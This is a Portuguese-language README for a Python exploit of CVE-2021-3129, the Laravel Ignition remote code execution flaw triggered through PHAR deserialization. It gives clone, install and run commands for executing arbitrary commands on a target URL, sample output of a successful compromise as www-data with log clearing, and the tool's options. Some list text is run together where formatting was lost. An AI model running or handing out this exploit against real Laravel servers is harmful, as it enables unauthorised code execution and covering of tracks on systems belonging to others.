
Exploit Python para CVE-2021-3129 que automatiza a desserialização PHAR para executar comandos arbitrários em endpoints Laravel Ignition vulneráveis.
Este é um script de exploit em Python para o CVE-2021-3129, uma vulnerabilidade de execução remota de código no Laravel quando o pacote Ignition está instalado. Esta vulnerabilidade permite que um invasor execute comandos arbitrários do sistema por meio de desserialização PHAR.
phpggcid, whoami, etc.)requestsClone o repositório:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
Instale os pacotes Python necessários:
pip install requests
Execute o script com o alvo e comando desejados:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
Exemplo de saída:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (obrigatório): A URL da aplicação Laravel vulnerável.--cmd (opcional): O comando a ser executado no alvo (padrão: whoami).--log_path (opcional): O caminho do arquivo de log a ser usado (padrão: ../storage/logs/laravel.log).
